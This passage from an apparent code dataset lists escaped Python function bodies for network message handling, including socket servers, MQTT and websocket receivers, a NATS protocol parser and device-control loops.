self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('mail from'))\n elif sent == 3:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))", "def run(self):\n while True:\n msg = self.recv()", "def post(self):\n try:\n msg = json.loads(self.request.body)\n command = msg[\"command\"]\n # start/stop data_worker\n if command == \"start\":\n message = self.start_data_worker()\n self.write({\"success\": True, \"message\": message})\n elif command == \"stop\":\n message = self.stop_data_worker()\n self.write({\"success\": True, \"message\": message})\n else:\n self.write({\"success\": False, \"message\": \"unknown command\"})\n except Exception:\n log.exception(\"Exception\")\n self.write({\"success\": False, \"message\": \"error during control\"})", "def handle_client(self):\n e = threading.Event()\n reg_t = threading.Thread(target=self.handle_reg_client, args=(e,))\n stream_t = threading.Thread(target=self.handle_stream_client,\n args=(e,))\n reg_t.start()\n stream_t.start()", "def receive_data(self):\n self.new_socket.listen(5)\n while True:\n channel, address = self.new_socket.accept()\n if self.clients_count < 5:\n Thread(target=self.listen_clients, args=(channel, address)).start()\n self.clients_count += 1\n print(\"No. 
of clients connected:\" + str(self.clients_count))\n else:\n print(\"No new threads allowed\")\n break", "def raw_readline(self):\n while True:\n # Check if the channel contains data.\n logger.debug(\"Preparing to read line from %s ..\", self.conn_label)\n data = self.conn_handle.readline()\n if data:\n break\n # If the readline() above returns an empty string the channel\n # is (probably) not connected. At this point we'll bother to\n # prepare a convoluted way to block until the channel does\n # become connected.\n logger.debug(\"Got an empty read, emulating blocking read of %s ..\", self.conn_label)\n # Set the O_ASYNC flag on the file descriptor connected to the\n # character device (this is required to use SIGIO signals).\n flags = fcntl.fcntl(self.conn_handle, fcntl.F_GETFL)\n fcntl.fcntl(self.conn_handle, fcntl.F_SETFL, flags | os.O_ASYNC)\n # Spawn a subprocess to reliably handle SIGIO signals. Due to the\n # nature of (SIGIO) signals more than one signal may be delivered\n # and this is a big problem when you want to do more than just call\n # sys.exit(). The alternative to this would be signal.pause() but\n # that function has an inherent race condition. To fix that race\n # condition there is sigsuspend() but this function is not\n # available in the Python standard library.\n waiter = WaitForRead()\n # If we get killed we need to make sure we take the subprocess\n # down with us, otherwise the subprocess may still be reading\n # from the character device when we are restarted and that's a\n # problem because the character device doesn't allow multiple\n # readers; all but the first reader will get the error\n # `IOError: [Errno 16] Device or resource busy'.\n with GracefulShutdown():\n try:\n # Start the subprocess.\n waiter.start()\n # Connect the file descriptor to the subprocess.\n fcntl.fcntl(self.conn_handle, fcntl.F_SETOWN, waiter.pid)\n # The channel may have become connected after we last got an empty\n # read but before we spawned our subprocess, so check one more\n # time to make sure.\n data = self.conn_handle.readline()\n if data:\n break\n # If there is still no data available we'll wait for the\n # subprocess to indicate that data has become available.\n waiter.join()\n # Let's see if the subprocess is right :-)\n data = self.conn_handle.readline()\n if data:\n break\n finally:\n logger.debug(\"Terminating subprocess with process id %i ..\", waiter.pid)\n waiter.terminate()\n # If the convoluted way to simulate blocking reads above ever\n # fails we don't want this method to turn into a `busy loop'.\n logger.debug(\"Blocking read emulation seems to have failed, falling back to 1 second polling interval ..\")\n time.sleep(1)\n logger.debug(\"Read %i bytes from %s: %r\", len(data), self.conn_label, data)\n return data", "def handle(self):\n thread_name = get_threadname()\n\n style_args = {}\n style_args['label'] = thread_name\n\n axis_args = {}\n axis_args['name'] = 'default'\n axis_args['x_label'] = ''\n axis_args['y_label'] = ''\n\n # client_init blocks until client sends 'BEGIN'\n first_value = self._handle_client_init(style_args, axis_args)\n if type(first_value) != float:\n if first_value == \"RETURN\":\n # done with client\n return\n else:\n print \"Unknown status\"\n return\n\n self._handle_setup_axis(axis_args)\n\n print \"Assigning to axis:\", axis_args['name']\n axes = self.server.axes[axis_args['name']]\n line_name = self._handle_create_line(axes, style_args)\n self._handle_update_legend(axes)\n\n # NOTE: client_read_data will block until client 
disconnects.\n self._handle_client_read_data(first_value, line_name)\n print \"Exiting:\", thread_name", "def run(self):\n watcher = self._watcher(self.on_recv)\n watcher.loop()", "def _run(self) -> None:\n\n log.debug(\"Volumio 2 Web Service client starting ...\")\n log.debug(f\"Connecting to Volumio 2 Web Service on {self._server}:{self._port}\")\n\n with SocketIO(self._server, self._port) as socketIO:\n log.debug(\"Connected to Volumio 2 Web Service\")\n socketIO.on(\"pushState\", self._on_state_response)\n socketIO.emit(\"GetState\", on_GetState_response)\n\n # Request initial values\n socketIO.emit(\"getState\", \"\")\n\n while not self._stop_event.is_set():\n # rely on Volumio to push states mostly, but request an update\n # at a low frequency to get some lacy update.\n socketIO.wait_for_callbacks(seconds=10)\n socketIO.emit(\"getState\", \"\")", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. \"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def dataReceived(self, data):\n startTime = time.time()\n reqid = \"unknown%i\" % startTime\n\n def checkDeferred(data, _host):\n parsedData = self.__parseData(data)\n if parsedData != None:\n if not parsedData.has_key('resource_start_time'):\n parsedData['resource_start_time'] = startTime\n reqid = parsedData.get('instance', \"unknown%i\" % startTime)\n logging.getLogger().info(\"%s start[%i]\" % (reqid, startTime))\n if logging.getLogger().getEffectiveLevel() < logging.DEBUG:\n rusage = list(resource.getrusage(resource.RUSAGE_SELF))\n rusageStr = \"[ %.3f, %.3f, %s ]\" % (rusage[0], rusage[1], str(rusage[2:])[1:-1])\n logging.getLogger().debug(\"%s gc(%s, %s), rs%s\" % (reqid, len(gc.get_objects()), len(gc.garbage), rusageStr))\n\n action, actionEx = self.check(self.factory, parsedData, _host)\n\n runTime = int((time.time() - startTime) * 1000)\n logging.getLogger().info(\"%s finish[%i]: %s (%s)\" % (reqid, runTime, action, actionEx))\n if logging.getLogger().getEffectiveLevel() < logging.DEBUG:\n rusage = list(resource.getrusage(resource.RUSAGE_SELF))\n rusageStr = \"[ %.3f, %.3f, %s ]\" % (rusage[0], rusage[1], str(rusage[2:])[1:-1])\n logging.getLogger().debug(\"%s gc(%s, %s), rs%s\" % (reqid, len(gc.get_objects()), len(gc.garbage), rusageStr))\n\n return action, actionEx\n else:\n # default return action for garbage?\n return None, None\n\n def checkDeferredCallback(data):\n self.dataResponse(data[0], data[1])\n\n def checkDeferredErrback(err):\n logging.getLogger().error(\"%s uncatched 
exception for connection id %s: %s\" % (reqid, self.numProtocolsId, err.getErrorMessage()))\n logging.getLogger().error(str(err.getTraceback()))\n self.dataResponse(self.returnOnFatalError[0], self.returnOnFatalError[1])\n\n # handle data in new thread and return results using deferred\n d = threads.deferToThread(checkDeferred, data, self.transport.getHost())\n d.addCallback(checkDeferredCallback)\n d.addErrback(checkDeferredErrback)", "def on_message(self, client, userdata, msg):\n\n data = json.loads(msg.payload.decode(\"utf-8\"))\n if debug: print(\"topic: \", msg.topic, \" payload:\", data)\n #print \"Received: \", data\n if msg.topic == self.subControls:\n self.controller.setpoint = int(data['temp'])\n status_old = self.controller.status\n if data['mode'] == \"auto\" or data['mode'] == \"cool1\" or data['mode'] == \"cool2\" or data['mode'] == \"cool3\":\n self.controller.status = 1\n elif data['mode'] == \"off\":\n self.controller.status = 0\n if status_old and self.controller.status: onoff = False\n elif status_old and not self.controller.status: onoff = True\n elif not status_old and self.controller.status: onoff = True\n else: onoff = False\n self.controller.updateControls(onoff = onoff, radio=False)\n\n elif msg.topic == self.subSettings :\n self.controller.temp_interval = int(data['temp-res'])\n self.controller.energy_interval = int(data['energy-res'])\n self.controller.updateIntervals()\n else:\n pass", "def recvData(self):\n prec_state = self.status\n self.status = Modem.Status.BUSY2RECV\n data = self.conn.recvData()\n self.status = prec_state\n self.checkConnection(data)\n return data", "async def receiver(self):\n socket_input = await self.websocket.recv()\n logger.debug(\"<<< Received:\\n{}\".format(socket_input))\n\n # Showdown sends this response on initial connection\n if socket_input == \"o\":\n logger.info(\"Connected on {}\".format(self.websocket_url))\n self.connected = True\n self.add_task(self.on_connect())\n return\n\n inputs = utils.parse_socket_input(socket_input)\n for room_id, inp in inputs:\n room_id = room_id or \"lobby\"\n logger.debug(\"||| Parsing:\\n{}\".format(inp))\n inp_type, params = utils.parse_text_input(inp)\n\n # Set challstr attributes and autologin\n if inp_type == \"challstr\":\n self.challengekeyid, self.challstr = params\n if self.name and self.password and self.autologin:\n await self.login()\n elif self.autologin:\n msg = (\n \"Cannot login without username and password. 
If \"\n \"you don't want your client to be logged in, \"\n \"you can use Client.start(autologin=False).\"\n )\n raise Exception(msg)\n\n # Process query response\n elif inp_type == \"queryresponse\":\n response_type, data = params[0], \"|\".join(params[1:])\n data = json.loads(data)\n self.add_task(\n self.on_query_response(response_type, data), transient=True\n )\n if response_type == \"savereplay\":\n self.add_task(\n self.server.save_replay_async(data), transient=True\n )\n\n # Challenge updates\n elif inp_type == \"updatechallenges\":\n self.challenges = json.loads(params[0])\n self.add_task(\n self.on_challenge_update(self.challenges), transient=True\n )\n\n # Messages\n elif inp_type == \"c:\" or inp_type == \"c\":\n timestamp = None\n if inp_type == \"c:\":\n timestamp, params = int(params[0]), params[1:]\n author_str, *content = params\n content = \"|\".join(content)\n chat_message = message.ChatMessage(\n room_id, timestamp, author_str, content, client=self\n )\n self.add_task(\n self.on_chat_message(chat_message), transient=True\n )\n elif inp_type == \"pm\":\n author_str, recipient_str, *content = params\n content = \"|\".join(content)\n private_message = message.PrivateMessage(\n author_str, recipient_str, content, client=self\n )\n self.add_task(\n self.on_private_message(private_message), transient=True\n )\n\n # Rooms\n elif inp_type == \"init\":\n room_type = params[0]\n room_obj = room.class_map.get(room_type, room.Room)(\n room_id, client=self, max_logs=self.max_room_logs\n )\n self.rooms[room_id] = room_obj\n self.add_task(self.on_room_init(room_obj), transient=True)\n elif inp_type == \"deinit\":\n if room_id in self.rooms:\n self.add_task(\n self.on_room_deinit(self.rooms.pop(room_id)),\n transient=True,\n )\n\n # add content to proper room\n if isinstance(self.rooms.get(room_id, None), room.Room):\n self.rooms[room_id].add_content(inp)\n\n self.add_task(\n self.on_receive(room_id, inp_type, params), transient=True\n )", "def run(self):\n self.display_messages.emit((\"Starting connection...\", \"blue\"))\n\n # Opening server process\n self.server_process = Popen([\"roslaunch\", \"crazyflie_driver\", \"crazyflie_server.launch\"], stdout=PIPE)\n\n self.display_messages.emit((\"Server online\", \"darkgreen\"))\n\n # Update crazyflies status to connecting\n for drone in self.available_drones:\n self.update_crazyflie_status.emit((drone, \"connecting...\", \"blue\"))\n\n # Opening communications with drones\n for drone in self.available_drones:\n self.cf_process = Popen([\"roslaunch\", \"psc\", \"run_real.launch\",\n \"cf:=\" + str(drone), \"radio_id:=\" + self.available_drones[drone]],\n stdout=PIPE, stderr=PIPE)\n\n start_time = time.time()\n while self.cf_process.poll() is None and time.time() < start_time+TIMEOUT:\n output, err = self.cf_process.communicate()\n err = str(err)\n if len(err) > 0:\n # Treating no USB device error\n if err.find(\"No matching USB Device\") >= 0:\n self.display_messages.emit((\"USB radio not detected\", \"red\"))\n time.sleep(NO_USB_DELAY)\n self.working = False\n self.stop()\n return\n\n # Treat timeout error\n if time.time() > start_time+TIMEOUT:\n self.update_crazyflie_status.emit((drone, \"connection timeout\", \"red\"))\n continue\n\n # Showing successful connection message\n self.update_crazyflie_status.emit((drone, \"online\", \"green\"))\n\n # Updating working status\n self.working = False", "def parse(self, data=''):\n self.scratch += data\n for i in self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if 
self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def reader(self, stop_event):\n while not stop_event.is_set():\n data, addr = self.sock.recvfrom(SRPCDef.FRAGMENT_SIZE * 10)\n if len(data) == 0:\n break\n payload = Payload(buffer=data)\n endpoint = Endpoint(addr[0], addr[1], payload.subport)\n connection = self.connectionTable.get(endpoint)\n\n if connection is not None: #Found a valid connection record\n connection.commandReceived(payload)\n elif payload.command == Command.CONNECT:\n payload = ConnectPayload(buffer=data)\n service = self.serviceTable.get(payload.serviceName)\n \n if service is not None:\n connection = Connection(self.sock, endpoint, service)\n self.connectionTable[endpoint] = connection\n connection.commandReceived(payload)\n #else: invalid connection + command request", "def run(self):\n self._log.info(\"Running\")\n self._running.set()\n\n if not self._dev:\n self._sock.connect((self._host_ip, self._host_port))\n\n self._connected.set()\n\n # select on the socket until we're told not to run anymore\n while self._running.is_set():\n if not self._dev:\n reads, _, _ = 
select.select([self._sock], [], [], 0.1)\n if len(reads) > 0:\n data = \"\"\n with self._send_recv_lock:\n while True:\n recvd = self._sock.recv(0x1000)\n if len(recvd) == 0:\n break\n data += recvd\n self._recv_callback(data)\n time.sleep(0.1)\n\n self._log.info(\"Finished\")", "def dataReceived (self, data) :\r\n \r\n buf = buffer.Buffer(self.recvbuffer + data)\r\n \r\n # process packets until there are no more of them\r\n\r\n try :\r\n buf.processWith(self.processPacket)\r\n except BaseClientAbort, e :\r\n self.do_abort(e.errorCode())\r\n \r\n self.log(\"closing connection\")\r\n self.transport.loseConnection()\r\n \r\n except BaseClientError, e :\r\n self.do_error(e.errorCode())\r\n \r\n except Exception, e :\r\n self.log(\"unknown exception %s: %s\" % (type(e), e))\r\n \r\n self.log(\"closing connection\")\r\n self.transport.loseConnection()\r\n \r\n raise\r\n \r\n # stuff remaining data back into recvbuf\r\n self.recvbuffer = buf.read()", "def run(self):\r\n while not self.shutdown_flag:\r\n try:\r\n # wait for connection\r\n if len(self.conns) == 0:\r\n self._wait()\r\n\r\n # receive message\r\n conn, (command, args) = self.recv()\r\n\r\n # process according to request\r\n if command == 'update_policy_network':\r\n self.agent.update_policy_network()\r\n elif command == 'get_action':\r\n action = self.agent.get_action(**args)\r\n self.send(conn, action)\r\n elif command == 'memorize':\r\n self.agent.memorize(**args)\r\n elif command == 'save_model':\r\n self.agent.save_model(**args)\r\n elif command == 'load_model':\r\n self.agent.load_model(**args)\r\n elif command == 'save_memory':\r\n self.agent.save_memory(**args)\r\n elif command == 'load_memory':\r\n self.agent.load_memory(**args)\r\n elif command == 'update_target_network':\r\n self.agent.update_target_network()\r\n elif command == 'detach':\r\n self.disconnect(conn)\r\n elif command == 'shutdown':\r\n self.shutdown_flag = True\r\n else:\r\n print('unknown command: {}'.format(command))\r\n except KeyboardInterrupt:\r\n print('interrupted')\r\n self.shutdown_flag = True\r\n break", "def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n # read the incoming command\r\n request = self.request.recv(1024).strip()\r\n # write to the queue waiting to be processed by the server\r\n INPUT_QUEUE.put(request)\r\n # wait for the server answer in the output queue\r\n response = OUTPUT_QUEUE.get(timeout=5.0)\r\n # send back the answer\r\n self.request.send(response)", "def callback_client_receive(data):\n data: GameStateModel = JSONSerializer.deserialize(data)\n logger.debug(f\"Client received {data.__class__.__name__} object from host.\")\n # print(f\"Client received {data.__class__.__name__} object from host.\")\n if isinstance(data, GameStateModel):\n GameStateModel.set_game(data)\n return\n if isinstance(data, TurnEvent) or isinstance(data, ActionEvent):\n exec_thread = threading.Thread(target=data.execute)\n exec_thread.start()", "def handle(self):\n try:\n while True:\n\n # Pop the message from the queue\n\n msg = self.queue.get_nowait()\n\n # Log anything if necesary\n\n self.log_message(msg)\n\n # Identify the src peer\n\n if 'src_id' in msg:\n\n if msg['src_id'] == -1:\n\n this_peer = None # Server message\n\n else:\n\n this_peer = self.peers[msg['src_id']]\n\n # If we are not up-to-date with server, only accept MSG_CONNECT and MSG_SET_ALL\n\n if isinstance(msg, MSG_CONNECT):\n\n if self.marker.id != msg['src_id']:\n\n print(\"Peer '{}' has joined the session\".format(msg['name']))\n\n elif type(msg) == 
MSG_SET_ALL:\n\n # Set the contents of the text box\n\n self.handle_setall(msg['data'])\n\n # Move the peers to their position\n\n for _, peer in self.peers.items():\n \n peer.move(peer.row, peer.col)\n\n # self.mark_set(peer.mark, peer.index())\n\n # Format the lines\n\n self.format_text()\n\n # Move the local peer to the start\n\n self.marker.move(1,0)\n\n # Flag that we've been update\n\n self.is_up_to_date = True\n\n elif self.is_up_to_date:\n\n # If the server responds with a console message\n\n if isinstance(msg, MSG_RESPONSE):\n\n if hasattr(self.root, \"console\"):\n\n self.root.console.write(msg['string']) \n\n # Stop running when server is manually killed \n\n elif isinstance(msg, MSG_KILL):\n\n if hasattr(self.root, \"console\"):\n\n self.root.console.write(msg['string']) \n\n self.root.push.kill()\n self.root.pull.kill()\n\n # Handles selection changes\n\n elif isinstance(msg, MSG_SELECT):\n\n sel1 = str(msg['start'])\n sel2 = str(msg['end'])\n \n this_peer.select(sel1, sel2)\n\n # Handles keypresses\n\n elif isinstance(msg, MSG_DELETE):\n\n self.handle_delete(this_peer, msg['row'], msg['col'])\n\n self.root.colour_line(msg['row'])\n\n elif type(msg) == MSG_BACKSPACE:\n\n self.handle_backspace(this_peer, msg['row'], msg['col'])\n\n self.root.colour_line(msg['row'])\n\n elif isinstance(msg, MSG_EVALUATE_BLOCK):\n\n lines = (int(msg['start_line']), int(msg['end_line']))\n\n this_peer.highlightBlock(lines)\n\n # Experimental -- evaluate code based on highlight\n\n string = self.get(\"{}.0\".format(lines[0]), \"{}.end\".format(lines[1]))\n \n self.root.lang.evaluate(string, name=str(this_peer), colour=this_peer.bg)\n\n elif isinstance(msg, MSG_EVALUATE_STRING):\n\n # Handles single lines of code evaluation, e.g. \"Clock.stop()\", that\n # might be evaluated but not within the text\n\n self.root.lang.evaluate(msg['string'], name=str(this_peer), colour=this_peer.bg)\n\n elif isinstance(msg, MSG_SET_MARK):\n\n row = msg['row']\n col = msg['col']\n\n this_peer.move(row, col)\n\n # If this is a local peer, make sure we can see the marker\n\n if this_peer == self.marker:\n\n self.mark_set(INSERT, \"{}.{}\".format(row, col))\n\n self.see(self.marker.mark)\n\n elif isinstance(msg, MSG_INSERT):\n\n self.handle_insert(this_peer, msg['char'], msg['row'], msg['col'])\n\n # Update IDE keywords\n\n self.root.colour_line(msg['row'])\n\n # If the msg is from the local peer, make sure they see their text AND marker\n\n if this_peer == self.marker:\n\n self.see(self.marker.mark)\n\n self.edit_separator()\n\n elif isinstance(msg, MSG_GET_ALL):\n\n # Return the contents of the text box\n\n data = self.handle_getall()\n\n reply = MSG_SET_ALL(-1, data, msg['src_id'])\n\n self.root.push_queue.put( reply ) \n\n elif isinstance(msg, MSG_REMOVE):\n\n # Remove a Peer\n this_peer.remove()\n \n del self.peers[msg['src_id']]\n \n print(\"Peer '{}' has disconnected\".format(this_peer)) \n\n elif isinstance(msg, MSG_BRACKET):\n\n # Highlight brackets on local client only\n\n if this_peer.id == self.marker.id:\n\n row1, col1 = msg['row1'], msg['col1']\n row2, col2 = msg['row2'], msg['col2']\n\n peer_col = int(self.index(this_peer.mark).split(\".\")[1])\n\n # If the *actual* mark is a ahead, adjust\n\n col2 = col2 + (peer_col - col2) - 1\n\n self.tag_add(\"tag_open_brackets\", \"{}.{}\".format(row1, col1), \"{}.{}\".format(row1, col1 + 1))\n self.tag_add(\"tag_open_brackets\", \"{}.{}\".format(row2, col2), \"{}.{}\".format(row2, col2 + 1))\n\n elif type(msg) == MSG_CONSTRAINT:\n\n new_name = msg['name']\n\n 
print(\"Changing to constraint to '{}'\".format(new_name))\n\n for name in self.root.creative_constraints:\n\n if name == new_name:\n\n self.root.creative_constraints[name].set(True)\n self.root.__constraint__ = constraints[name](msg['src_id'])\n\n else:\n\n self.root.creative_constraints[name].set(False)\n\n elif type(msg) == MSG_SYNC:\n\n # Set the contents of the text box\n\n self.handle_setall(msg['data'])\n\n # Move the peers to their position\n\n for _, peer in self.peers.items():\n \n peer.move(peer.row, peer.col)\n\n # Format the lines\n\n self.format_text()\n\n elif type(msg) == MSG_UNDO:\n\n self.handle_undo()\n\n # Give some useful information about what the message looked like if error\n\n else:\n\n print(\"Error in text box handling. Message was {}\".format(msg.info()))\n\n raise e\n\n # Update any other idle tasks\n\n self.update_idletasks()\n\n # This is possible out of date - TODO check\n\n if msg == self.root.wait_msg:\n\n self.root.waiting = False\n self.root.wait_msg = None\n self.root.reset_title()\n\n self.refreshPeerLabels()\n\n # Break when the queue is empty\n except queue.Empty:\n \n self.refreshPeerLabels()\n\n # Recursive call\n self.after(30, self.handle)\n return", "def handle_connection(conn, addr, create):\r\n print 'connection recieved from:', addr\r\n server = create()\r\n server.startup()\r\n while True:\r\n data = conn.recv(1024) # read data from the connection / raw input\r\n if not data:\r\n break\r\n print 'from client:', data\r\n response = server.process(data)\r\n conn.send(response)\r\n server.finish()\r\n conn.close()", "def __run_client(self):\n\n self._client = CoapClient(server_hostname=self._hostname, server_port=self._port, src_port=self._src_port)\n self._client_running = True\n\n if self.use_polling:\n super(CoapSensor, self).on_start()\n else:\n self.observe_topic()", "def run(self):\n\n lastLevel = 0\n\n MSG_SIZ = 12\n\n while self.go:\n\n buf = self.sock.recv(MSG_SIZ)\n\n while self.go and len(buf) < MSG_SIZ:\n buf += self.sock.recv(MSG_SIZ-len(buf))\n\n if self.go:\n seq, flags, tick, level = (struct.unpack('HHII', buf))\n\n if flags == 0:\n changed = level ^ lastLevel\n lastLevel = level\n for cb in self.callbacks:\n if cb.bit & changed:\n newLevel = 0\n if cb.bit & level:\n newLevel = 1\n if (cb.edge ^ newLevel):\n cb.func(cb.gpio, newLevel, tick)\n else:\n gpio = flags & 31\n for cb in self.callbacks:\n if cb.gpio == gpio:\n cb.func(cb.gpio, TIMEOUT, tick)\n\n self.sock.close()", "def __receive_request(self):\n # get the request's length\n request_size = self.__socket.recv(Commands.SIZE_LENGTH)\n # if the master sent an empty msg, then he has closed himself\n if not request_size:\n print \"Master Has Been Closed\"\n # TODO: close the peasant and start the run function all over again\n return False\n # fix the request's length\n request_size = int(request_size) - Commands.COMMAND_LENGTH\n # get the request's command's number\n command = int(Commands.decrypt(self.__socket.recv(Commands.COMMAND_LENGTH)))\n # if the request size's is 0, then there are not args\n args = []\n # else, there are args, read them (decrypted)\n if request_size != 0:\n args = Commands.decrypt(self.__socket.recv(request_size)).split(Commands.SEPARATE_CHAR)\n if self.__DEBUG:\n print args\n # handle the command and add the command number and return value to the responses list\n self.__responses.append(str(command) + Commands.handle_command_request(command, args))\n return True", "def process_received_message(self, msg: str):\n all = msg.split(\":\")\n if len(all) < 
2:\n self.log.warning(\"Recv bad formated cmd\", msg)\n return\n cmd, all_param = all[:2]\n params = all_param.split(\";\")\n\n self.strip.setPixelColorRGB(0, 0, 0, 0)\n if cmd == \"\":\n pass\n elif cmd == \"SWU\": # switch update\n sw_id = params[0]\n sw_state = int(params[1])\n self.machine.switch_controller.process_switch_by_num(sw_id, state=sw_state, platform=self, logical=False)\n self.strip.setPixelColorRGB(0, 0, 0, 0xff) # blue\n elif cmd == \"DBG\": # debug message\n self.log.debug(\"RECV:%s\" % msg)\n elif cmd == \"INF\": # debug message\n self.log.info(\"RECV:%s\" % msg)\n elif cmd == \"WRN\": # warning message\n self.log.warning(\"RECV:%s\" % msg)\n self.strip.setPixelColorRGB(0, 0xff, 0xff, 0) # yellow\n elif cmd == \"ERR\": # warning message\n self.log.error(\"RECV:%s\" % msg)\n self.strip.setPixelColorRGB(0, 0xff, 0, 0) # red\n elif cmd == \"TCK\": # arduino is alive !\n self.log.debug(\"TCK ok:%d\" % int(params[0]))\n elif cmd == \"ACK\": # ack of frame\n self.communicator.ack_frame(int(params[0]), params[1] == \"OK\")\n self.strip.setPixelColorRGB(0, 0, 0xff, 0) # green\n else:\n self.log.warning(\"RECV:UNKNOWN FRAME: [%s]\" % msg)\n l = len(self.communicator.frames)\n #TODO: self.machine['frame_cnt'] = l\n self.strip.show()\n self.machine.events.post_async('raspberry_frame_count', frame_cnt=l, frames=self.communicator.frames)", "async def listen(self):\n\n while True:\n if not self.connected:\n # sleep and hope the checker fixes us\n await asyncio.sleep(5)\n continue\n data = await self.read_one_message()\n if data is None:\n await asyncio.sleep(1)\n continue\n mtype = self.find_balboa_mtype(data)\n\n if mtype is None:\n self.log.error(\"Spa sent an unknown message type.\")\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_CONFIG_RESP:\n (self.macaddr, junk, morejunk) = self.parse_config_resp(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_STATUS_UPDATE:\n await self.parse_status_update(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_PANEL_RESP:\n self.parse_panel_config_resp(data)\n await asyncio.sleep(0.1)\n continue\n if mtype == BMTR_PANEL_NOCLUE1:\n self.parse_noclue1(data)\n await asyncio.sleep(0.1)\n continue\n self.log.error(\"Unhandled mtype {0}\".format(mtype))", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "def loop(self):\n\n while True:\n data = self.socket.recv(1024*8)\n\n if len(data) <= 0:\n raise NodeDisconnectException(\"Node disconnected.\")\n \n self.buffer.write(data)\n data = self.receive_message()\n\n # Check if the message is still incomplete to parse\n if data is None:\n continue\n\n # Check for the header and message\n message_header, message = data\n if not message:\n continue\n\n handle_func_name = \"handle_\" + message_header.command\n handle_func = getattr(self, handle_func_name, None)\n if handle_func:\n handle_func(message_header, message)", "def monitor(self):\n while True:\n client_socket, client_address = self.server_socket.accept()\n print(\"New client connection accepted: {}:{}\".format(*client_address))\n threading.Thread(target=self.handle_client, args=[client_socket]).start()", "def run(self):\n log.info(\"Starting thread\")\n if self.open_listener():\n\n # This feels so dirty, but we need to make sure the thread isn't always blocking so we\n # can safely shutdown the thread. Given that the Listener address is always an IP\n # it should be safe. 
Should be, famous last words of course...\n conn = self.listener._listener._socket\n\n while self.running:\n r_list, w_list, e_list = select.select([conn, ], [conn, ], [conn, ], 0.01)\n\n if conn in r_list:\n connection = None\n try:\n connection = self.listener.accept()\n log.info(\"Connection opened by %s\", self.listener.last_accepted)\n\n while self.running:\n if connection.poll():\n msg = connection.recv()\n globals.strip_data.spi_recv(msg)\n except (IOError, EOFError):\n if connection:\n connection.close()\n log.info(\"Connection closed %s\", self.listener.last_accepted)\n\n log.info(\"Exiting thread\")", "def handle(self):\n try:\n # Wait for data\n data = json.loads(self.request.recv(1024).decode('UTF-8').strip())\n\n # Process data\n self.process_data(data)\n\n except Exception as e:\n print(\"Exception wile receiving message: \", e)\n self.request.sendall(\n bytes(json.dumps({'return': 'error'}), 'UTF-8'))", "def __comms_thread_body(self):\n\n # Define a callback that will handle receipt of data.\n def comms_callback(received, prog):\n \"\"\" Asynchronous callback issued when the 